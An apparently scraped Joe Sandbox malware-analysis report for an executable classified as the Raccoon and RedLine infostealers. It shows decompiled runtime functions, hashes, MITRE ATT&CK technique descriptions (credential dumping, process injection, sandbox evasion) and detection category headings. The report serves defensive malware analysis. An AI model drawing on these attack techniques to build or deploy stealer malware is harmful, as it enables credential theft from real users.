Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: 92d8b121442a0a2cdbb79da8a415f01f4b29b20e9f59e438ac5b68aa7eb4b99e
Instruction ID: c6d1b6845e2c053c345ae280f484e0bfd878fab5867166408313d6144d0e7c50
Opcode Fuzzy Hash: 92d8b121442a0a2cdbb79da8a415f01f4b29b20e9f59e438ac5b68aa7eb4b99e
Instruction Fuzzy Hash: F8F06862C08E4481D2159F1CD4000FBB375FF4EB99F545326EE8D2A575DF18D5468710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B9E610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715B9E610() {

				goto 0x15b9e56f;
				goto 0x15b9e56f;
				0;
				return 0;
			}

0x7ff715b9e617
0x7ff715b9e623
0x7ff715b9e62e
0x7ff715b9e632

APIs

fprintf.MSVCRT ref: 00007FF715B9E5B0

Strings

Total loss of significance (TLOSS), xrefs: 00007FF715B9E610
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF715B9E597

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 21faa2479aa95e37f926b68196dda3b8b6095bded163c75ada7529037666dbb7
Instruction ID: 115e056f990268b29a67c977ec59e86715ad3df27da1bb59a5fc7a2baca2b5d3
Opcode Fuzzy Hash: 21faa2479aa95e37f926b68196dda3b8b6095bded163c75ada7529037666dbb7
Instruction Fuzzy Hash: F8F06262D18E8482D2169F2CE4000EBB375FF4EB99F685326EE8D2A574DF28D6468710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B9E5D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715B9E5D0() {

				goto 0x15b9e56f;
				goto 0x15b9e56f;
				0;
				return 0;
			}

0x7ff715b9e617
0x7ff715b9e623
0x7ff715b9e62e
0x7ff715b9e632

APIs

fprintf.MSVCRT ref: 00007FF715B9E5B0

Strings

Argument domain error (DOMAIN), xrefs: 00007FF715B9E5D0
_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF715B9E597

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 3e6e34d318e72c40502d74ba7c62aacede3605a22e17c65394e09e2c7d30bf8a
Instruction ID: 2605835f3a4fe8d4add3195dc7e6bd16a6a5de689d8e483c4e15eb23443f5025
Opcode Fuzzy Hash: 3e6e34d318e72c40502d74ba7c62aacede3605a22e17c65394e09e2c7d30bf8a
Instruction Fuzzy Hash: 11F06262C08E8482D216DF2CE4000EBB374FF4EB99F685326EF8D2A574DF28D6468710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B9E568 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF715B9E5B0

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF715B9E597
Argument singularity (SIGN), xrefs: 00007FF715B9E568

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: 7b03488b071f9b73a97bef2abc4efa76e6994db115f440a649f5ed4b0622428e
Instruction ID: ff77725f667d497c493dc475a4b1ccf89333d4c8b23b47155f88727c99a52054
Opcode Fuzzy Hash: 7b03488b071f9b73a97bef2abc4efa76e6994db115f440a649f5ed4b0622428e
Instruction Fuzzy Hash: A0F06222804E8482D2169F2CE4000ABB365FF4EB99F545326EE8D2A534DF28D5468710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA9550 Relevance: 5.1, APIs: 4, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715BA9550(intOrPtr* __rcx) {
				intOrPtr* _t6;

				if (__rcx == 0) goto 0x15ba95f0;
				_t6 =  *((intOrPtr*)(__rcx));
				if (_t6 == 0) goto 0x15ba95f0;
				if (_t6 == 0xffffffff) goto 0x15ba9660;
				if ( *_t6 == 0xc0bab1fd) goto 0x15ba9590;
				return 0x16;
			}

0x7ff715ba955c
0x7ff715ba9562
0x7ff715ba9568
0x7ff715ba9572
0x7ff715ba9583
0x7ff715ba958e

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF715BA9597
LeaveCriticalSection.KERNEL32 ref: 00007FF715BA95C1

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 966df289b8b8c66977ad1a09e719be2d6dd09e40930df4ea73119a1ba05daa92
Instruction ID: f4fc4814c79baaafd7db45f5256a892063d0732018ba7b1ba9e928daab7d4f8c
Opcode Fuzzy Hash: 966df289b8b8c66977ad1a09e719be2d6dd09e40930df4ea73119a1ba05daa92
Instruction Fuzzy Hash: DB31A577A04A418AE769DF35D40176A63A0FB40F7CF884132DD294A3A4DF3CD889D760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA9880 Relevance: 5.1, APIs: 4, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00007FF77FF715BA9880(intOrPtr* __rcx, void* __rdx) {
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr _t19;
				void* _t27;
				intOrPtr* _t28;

				_t19 =  *__rcx;
				_t28 = __rcx;
				EnterCriticalSection(??);
				_t14 =  *((intOrPtr*)(_t19 + 0xc));
				if (_t14 == 0) goto 0x15ba9900;
				 *((intOrPtr*)(_t19 + 0xc)) = _t27 - 1;
				LeaveCriticalSection(??);
				if (_t14 != 1) goto 0x15ba98da;
				if (E00007FF77FF715BA8880(1,  *((intOrPtr*)(_t19 + 0xa8)), _t19 + 0x70, _t19 + 0x98) != 0) goto 0x15ba98e7;
				_t12 = E00007FF77FF715BA04E0( *((intOrPtr*)(_t28 + 8)));
				if (_t12 == 0) goto 0x15ba98ed;
				 *((intOrPtr*)( *((intOrPtr*)(_t28 + 0x10)))) = _t12;
				return _t12;
			}

0x7ff715ba988c
0x7ff715ba9893
0x7ff715ba9899
0x7ff715ba989f
0x7ff715ba98a4
0x7ff715ba98ac
0x7ff715ba98af
0x7ff715ba98b8
0x7ff715ba98d8
0x7ff715ba98de
0x7ff715ba98e5
0x7ff715ba98eb
0x7ff715ba98f9

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF715BA9899
LeaveCriticalSection.KERNEL32 ref: 00007FF715BA98AF

Part of subcall function 00007FF715BA8880: EnterCriticalSection.KERNEL32 ref: 00007FF715BA8898
Part of subcall function 00007FF715BA8880: ReleaseSemaphore.KERNEL32 ref: 00007FF715BA88C6
Part of subcall function 00007FF715BA8880: LeaveCriticalSection.KERNEL32 ref: 00007FF715BA88D3

LeaveCriticalSection.KERNEL32 ref: 00007FF715BA9913

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$ReleaseSemaphore
String ID:
API String ID: 3630377130-0
Opcode ID: a6a694f03dcd84c9aafc1569ff64daada8cc26fed13ff27649296c944c028d04
Instruction ID: 3e10eb5931054fc792d45fdc4a1797f5543b17d1b06fd6e40bc73b1703ad601e
Opcode Fuzzy Hash: a6a694f03dcd84c9aafc1569ff64daada8cc26fed13ff27649296c944c028d04
Instruction Fuzzy Hash: 69316236A04A0296E779AF35D4106B973A0FB85FA8F944135DE1D873A5DF38E449D320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA9410 Relevance: 5.1, APIs: 4, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF715BA9410(intOrPtr* __rcx) {
				intOrPtr* _t6;

				if (__rcx == 0) goto 0x15ba94a8;
				_t6 =  *((intOrPtr*)(__rcx));
				if (_t6 == 0) goto 0x15ba94a8;
				if (_t6 == 0xffffffff) goto 0x15ba9510;
				if ( *_t6 == 0xc0bab1fd) goto 0x15ba9450;
				return 0x16;
			}

0x7ff715ba941a
0x7ff715ba9420
0x7ff715ba9426
0x7ff715ba9430
0x7ff715ba9441
0x7ff715ba944a

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF715BA9457
LeaveCriticalSection.KERNEL32 ref: 00007FF715BA947E

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 0820afe1cf76078d584808b710687c4abc637131e2d4a4fc2351118ea3fed728
Instruction ID: a37017bcb03fa4c0437380007b9337bbbde32a4d33feffde48c532fa96458423
Opcode Fuzzy Hash: 0820afe1cf76078d584808b710687c4abc637131e2d4a4fc2351118ea3fed728
Instruction Fuzzy Hash: E731A476E18A028AD779DF35D401269B3A0FB44F78F988235DD1D4A7A8DF38D488D720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA9120 Relevance: 5.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00007FF715BA9749), ref: 00007FF715BA9146
LeaveCriticalSection.KERNEL32(?,00007FF715BA9749,?,?,?,?,?,?,?,?,?,?,?,00007FF715E51400,?), ref: 00007FF715BA916B
EnterCriticalSection.KERNEL32(?,00007FF715BA9749,?,?,?,?,?,?,?,?,?,?,?,00007FF715E51400,?), ref: 00007FF715BA919C
LeaveCriticalSection.KERNEL32(?,00007FF715BA9749,?,?,?,?,?,?,?,?,?,?,?,00007FF715E51400,?), ref: 00007FF715BA91A6

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 1d3946a3044cc18cb778b92247febb096362daa03944763a571c42cbc9225e9a
Instruction ID: be461b1af80078dcee5ecc32d71ac1677d1a0aaee3050753b685b357c1412afe
Opcode Fuzzy Hash: 1d3946a3044cc18cb778b92247febb096362daa03944763a571c42cbc9225e9a
Instruction Fuzzy Hash: 9101F72AB08A45A9E63AE723AC44A2B9650BF84FF9FC55031DE0D07760CF3DD44A9350

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report N2wufLmC74.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Raccoon

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Operating System Destruction

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

